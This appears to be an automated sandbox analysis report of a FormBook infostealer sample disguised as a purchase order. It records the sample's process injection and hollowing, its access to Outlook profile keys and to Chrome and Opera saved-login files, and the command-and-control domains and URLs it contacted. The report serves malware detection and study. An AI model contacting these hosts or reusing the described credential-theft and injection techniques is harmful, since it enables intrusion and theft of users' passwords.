Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\cmmon32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmmon32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 626541 Sample: PO#12108997.exe Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 8 other signatures 2->49 10 PO#12108997.exe 3 2->10         started        process3 file4 33 C:\Users\user\AppData\...\PO#12108997.exe.log, ASCII 10->33 dropped 13 vbc.exe 10->13         started        process5 signatures6 61 Modifies the context of a thread in another process (thread injection) 13->61 63 Maps a DLL or memory area into another process 13->63 65 Sample uses process hollowing technique 13->65 67 2 other signatures 13->67 16 explorer.exe 13->16 injected process7 dnsIp8 35 www.madurababe.net 188.114.97.10, 49839, 49840, 49841 CLOUDFLARENETUS European Union 16->35 37 www.tyz.world 16->37 39 tyz.world 34.102.136.180, 49810, 49811, 49812 GOOGLEUS United States 16->39 41 System process connects to network (likely due to code injection or exploit) 16->41 20 cmmon32.exe 18 16->20         started        signatures9 process10 file11 29 C:\Users\user\AppData\...\3NMlogrv.ini, data 20->29 dropped 31 C:\Users\user\AppData\...\3NMlogri.ini, data 20->31 dropped 51 Detected FormBook malware 20->51 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55 57 3 other signatures 20->57 24 cmd.exe 2 20->24         started        signatures12 process13 signatures14 59 Tries to harvest and steal browser information (history, passwords, etc) 24->59 27 conhost.exe 24->27         started        process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.114.97.10
 www.madurababe.net European Union
13335 CLOUDFLARENETUS true
34.102.136.180
 tyz.world United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
tyz.world 34.102.136.180 true
www.madurababe.net 188.114.97.10 true
www.tyz.world unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.mybenefitassist.com/p12s/ true
  • Avira URL Cloud: safe
 low
http://www.tyz.world/p12s/ false
  • Avira URL Cloud: safe
 unknown
http://www.madurababe.net/p12s/ true
  • Avira URL Cloud: safe
 unknown
http://www.tyz.world/p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA false
  • Avira URL Cloud: safe
 unknown
http://www.madurababe.net/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd true
  • Avira URL Cloud: safe
 unknown